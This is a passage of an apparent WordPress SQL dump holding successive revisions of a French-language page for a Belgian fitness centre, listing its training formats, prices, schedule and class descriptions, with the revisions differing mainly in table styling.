(115, 1, '2013-06-16 14:20:55', '2013-06-16 14:20:55', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color:#cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color:#eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color:#cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:20:55', '2013-06-16 14:20:55', '', 11, 'http://www.crosstrainingcenter.be/?p=115', 0, 'revision', '', 0),
(116, 1, '2013-06-16 14:24:10', '2013-06-16 14:24:10', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:24:10', '2013-06-16 14:24:10', '', 11, 'http://www.crosstrainingcenter.be/?p=116', 0, 'revision', '', 0),
(117, 1, '2013-06-16 14:24:59', '2013-06-16 14:24:59', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #cccccc;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:24:59', '2013-06-16 14:24:59', '', 11, 'http://www.crosstrainingcenter.be/?p=117', 0, 'revision', '', 0),
(118, 1, '2013-06-16 14:25:45', '2013-06-16 14:25:45', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #ebebeb;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #ebebeb;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:25:45', '2013-06-16 14:25:45', '', 11, 'http://www.crosstrainingcenter.be/?p=118', 0, 'revision', '', 0),
(119, 1, '2013-06-16 14:26:21', '2013-06-16 14:26:21', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fefefe;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fefefe;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:26:21', '2013-06-16 14:26:21', '', 11, 'http://www.crosstrainingcenter.be/?p=119', 0, 'revision', '', 0),
(120, 1, '2013-06-16 14:26:44', '2013-06-16 14:26:44', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #f0f0f0;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #f0f0f0;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fefefe;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:26:44', '2013-06-16 14:26:44', '', 11, 'http://www.crosstrainingcenter.be/?p=120', 0, 'revision', '', 0),
(121, 1, '2013-06-16 14:27:41', '2013-06-16 14:27:41', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #f5f5f5;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #f5f5f5;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:27:41', '2013-06-16 14:27:41', '', 11, 'http://www.crosstrainingcenter.be/?p=121', 0, 'revision', '', 0),
(122, 1, '2013-06-16 14:27:58', '2013-06-16 14:27:58', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #f5f5f5;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours ?</h2>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:27:58', '2013-06-16 14:27:58', '', 11, 'http://www.crosstrainingcenter.be/?p=122', 0, 'revision', '', 0),
(123, 1, '2013-06-16 14:28:10', '2013-06-16 14:28:10', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 